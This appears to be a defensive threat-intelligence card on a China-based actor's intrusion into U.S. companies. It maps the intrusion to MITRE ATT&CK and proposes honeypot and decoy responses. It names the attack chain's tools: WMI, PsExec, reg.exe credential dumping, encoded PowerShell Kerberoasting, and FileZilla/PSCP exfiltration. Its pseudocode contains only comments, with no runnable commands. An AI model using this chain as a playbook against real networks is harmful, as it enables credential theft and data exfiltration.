Subject: China attacks U.S. Companies
Tactics: TA0006 Credential Access, TA0007 Discovery, TA0010 Exfiltration, TA0001 Initial Access, TA0008 Lateral Movement
Technique: T1087 Account Discovery, T1041 Exfiltration Over C2 Channel, T1133 External Remote Services, T1003 OS Credential Dumping, T1021 Remote Services, T1558 Steal or Forge Kerberos Tickets, T1082 System Information Discovery
Procedure:
The attackers leveraged WMI, Microsoft’s command-line tool, to execute commands on a remote computer, indicating a possible exploitation of external remote services for gaining initial access to the network.
Vulnerability: EAV0010 When adversaries interact with network or system resources, they are vulnerable to triggering tripwires or engaging in easily detectable, anomalous behavior., EAV0017 When adversaries discover enabled, accessible, or intentionally weakened/overly permissive resources in the environment (production or isolated), they are vulnerable to revealing additional or more advanced capabilities when exploiting or using said resource.
Engagement Opportunity:
Deploy a honeypot mimicking a vulnerable remote service (like WMI) to lure attackers. Monitor the honeypot for interactions resembling the attack patterns observed in the report. This setup can help in understanding attacker TTPs, gather intelligence on their tools, and potentially identify the threat actors.
Threat Actor: China-based threat actor
Threat Objective:
Gain unauthorized access to the network and execute malicious commands for further exploitation.
Deception Opportunity:
Set up a decoy network segment with intentionally vulnerable remote services. Lead the attackers towards this segment through breadcrumbs or by making it appear as a high-value target. This can divert their attention from the actual network and provide an opportunity to study their tools and techniques in a controlled environment.
Sensor Data Placement: User-Mode
Observable Level: Core to Pre-Existing Tool
Scoring Rationale:
The analytic focuses on the usage of WMI, a legitimate tool present on Windows systems. Leveraging such tools is a common attacker tactic, making the observable core to the attacker’s technique. The data required for this analytic would likely reside in user-mode process logs or command execution monitoring tools.
Link to Report:
Link to Report II.:
Additional Comments:
The initial attack vector remains unknown; the attackers may have used an unknown exploit or social engineering tactic to gain initial access. Further investigation is needed to determine the exact entry point.
Possible elements:
MSG (Pseudocode):
# Malicious Sub-Graph Standard
# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])
# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])
# China-based Threat Actor Attack Chain
[1]: Initial Access [TA0001] - External Remote Services [T1133] - Leverage WMI to execute commands on a remote computer (Core to Pre-Existing Tool) [cite: 18]
[2]: Discovery [TA0007] - System Information Discovery [T1082] - Use "wevtutil" to query Windows Event Logs (Core to Pre-Existing Tool) [cite: 44]
[3]: Discovery [TA0007] - Account Discovery [T1087] - Use PowerShell to enumerate Active Directory information (Core to Pre-Existing Tool) [cite: 46, 47, 53]
[4]: Lateral Movement [TA0008] - Remote Services [T1021] - Use "PsExec" and WMI for remote command execution (Core to Pre-Existing Tool) [cite: 18, 34, 40, 50, 54]
[5]: Credential Access [TA0006] - OS Credential Dumping [T1003] - Use "reg.exe" to dump credentials from the registry (Core to Pre-Existing Tool) [cite: 19]
[6]: Credential Access [TA0006] - Kerberoasting [T1558] - Execute encoded PowerShell script to extract Kerberos security tokens for service accounts (Core to Some Implementations of (Sub-)Technique) [cite: 22, 23, 24, 25]
[7]: Exfiltration [TA0010] - Exfiltration Over C2 Channel [T1041] - Deploy "FileZilla" and "PSCP" for data exfiltration (Core to Adversary-Brought Tool) [cite: 35, 38, 39]
1 --> 2 (Lack of System Monitoring)
2 --> 3 (Lack of Active Directory Security)
3 --> 4 (Lack of Network Segmentation)
4 --> 5 (Lack of Account Security)
5 --> 6 (Weak Password Policy)
6 --> 7 (Lack of Data Loss Prevention)
# Pseudocode Standard
# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]
function Initial_Access_External_Remote_Services(target_computer):
# Utilize WMI to connect to the target computer
# Execute malicious commands on the target
return remote_code_execution
function Discovery_System_Information_Discovery():
# Execute "wevtutil" command to query Windows Event Logs
return system_information
function Discovery_Account_Discovery():
# Execute PowerShell scripts to enumerate Active Directory information
return account_information
function Lateral_Movement_Remote_Services(target_computer):
# Utilize PsExec and WMI to connect to the target computer
# Execute malicious commands on the target
return lateral_movement
function Credential_Access_OS_Credential_Dumping():
# Execute "reg.exe" to dump credentials from the registry
return credentials
function Credential_Access_Kerberoasting():
# Execute encoded PowerShell script to extract Kerberos security tokens
return kerberos_tickets
function Exfiltration_Exfiltration_Over_C2_Channel(exfiltrated_data):
# Utilize FileZilla and PSCP to exfiltrate data
return exfiltration_success